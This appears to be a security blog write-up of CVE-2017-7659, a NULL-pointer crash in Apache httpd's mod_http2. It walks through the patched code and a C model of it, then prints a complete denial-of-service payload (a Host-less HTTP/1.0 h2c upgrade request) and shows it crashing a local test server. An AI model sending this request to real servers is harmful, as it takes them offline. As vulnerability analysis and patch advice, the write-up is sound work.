Recently, Apache released Apache httpd 2.4.26, which fixes a number of issues; you can find the details in this link. One of these issues is CVE-2017-7659. This article discusses the issue and shows the payload.
For CVE-2017-7659, Apache gives the following description:
A maliciously constructed HTTP/2 request could cause mod_http2 to dereference a NULL pointer and crash the server process.
From this we know that the issue is related to the HTTP/2 protocol. On GitHub we can see which code was changed; for the details, click this link.
Only one line changed: a check on the return value of the h2_request_rcreate function.
CVE-2017-7659 is tied to the h2_request_rcreate function, so let's look at that function.
Reading the affected code, we can see that Apache calls h2_request_rcreate to create the HTTP/2 request structure req. If h2_request_rcreate fails, req is left NULL, and when ap_log_rerror then uses it, the httpd process crashes. (See the following code.)
Now look at h2_request_rcreate itself. At the start, this function sets req to 0, then checks four values: r->method, scheme, r->hostname and path. If any of them is NULL, it returns a failure status. Because req is still 0 when it returns failure, the httpd process crashes.
Of these values, only hostname can be NULL in practice. So an HTTP request without a hostname crashes the Apache httpd process.
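To make the fix concrete, here is an added example (my own code, not Apache's source) that models the pattern described above: a creation function that zeroes its output and fails when any field is missing, a pre-fix caller that ignores the status and dereferences NULL, and a post-fix caller that checks the status. The structure names, the error codes and the 400/101 return values are assumptions for illustration.

```c
#include <stdio.h>
#include <stdlib.h>

/* Constructed stand-ins for the fields h2_request_rcreate inspects
   (not Apache's own structures). hostname is NULL when no Host was sent. */
typedef struct {
    const char *method;
    const char *scheme;
    const char *hostname;
    const char *path;
} request_rec_t;

typedef struct {
    const char *method, *scheme, *authority, *path;
} h2_request_t;

#define APR_SUCCESS 0
#define APR_EINVAL  22

/* Models the described behaviour: *preq is zeroed first, and any missing
   field makes the call fail, leaving *preq NULL for the caller. */
int request_rcreate(h2_request_t **preq, const request_rec_t *r)
{
    *preq = NULL;
    if (!r->method || !r->scheme || !r->hostname || !r->path)
        return APR_EINVAL;
    h2_request_t *req = calloc(1, sizeof(*req));
    if (!req)
        return APR_EINVAL;
    req->method = r->method;       req->scheme = r->scheme;
    req->authority = r->hostname;  req->path = r->path;
    *preq = req;
    return APR_SUCCESS;
}

/* Pre-fix shape: the status is ignored and req is used in the log line,
   so a Host-less upgrade request dereferences NULL. Shown for contrast only. */
void handle_upgrade_unchecked(const request_rec_t *r)
{
    h2_request_t *req;
    (void)request_rcreate(&req, r);
    printf("upgrading %s %s\n", req->method, req->path);  /* crashes when req == NULL */
}

/* Post-fix shape: the one-line check turns the crash into a client error. */
int handle_upgrade_checked(const request_rec_t *r)
{
    h2_request_t *req;
    if (request_rcreate(&req, r) != APR_SUCCESS)
        return 400;  /* reject the malformed request instead of crashing */
    printf("upgrading %s %s\n", req->method, req->path);
    free(req);
    return 101;      /* switching protocols */
}
```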
Now, let's create the CVE-2017-7659 payload. To trigger this issue, the target website must:
- support HTTP/2 (the h2c upgrade)
- receive an HTTP/1.0 request without a Host header
This is the CVE-2017-7659 payload: an HTTP/1.0 request with no Host header.
GET / HTTP/1.0
User-Agent: curl/7.50.1
Accept: */*
Connection: Upgrade, HTTP2-Settings
Upgrade: h2c
HTTP2-Settings: AAMAAABkAAQAAP__
Content-Length: 2
First, I set up an Apache HTTP server on my Kali Linux. The version is 2.4.25.
Then I start Apache; the website and server are working very well.
However, then I submit this payload using Burp Suite.
After submitting the payload, the website does not give any response. If you check the Apache log, you will find a segmentation fault error. The httpd process is dead.
CVE-2017-7659 can be used for a DoS attack. It can easily kill your Apache HTTP Server process. So, for me, I highly recommend upgrading your Apache HTTP Server.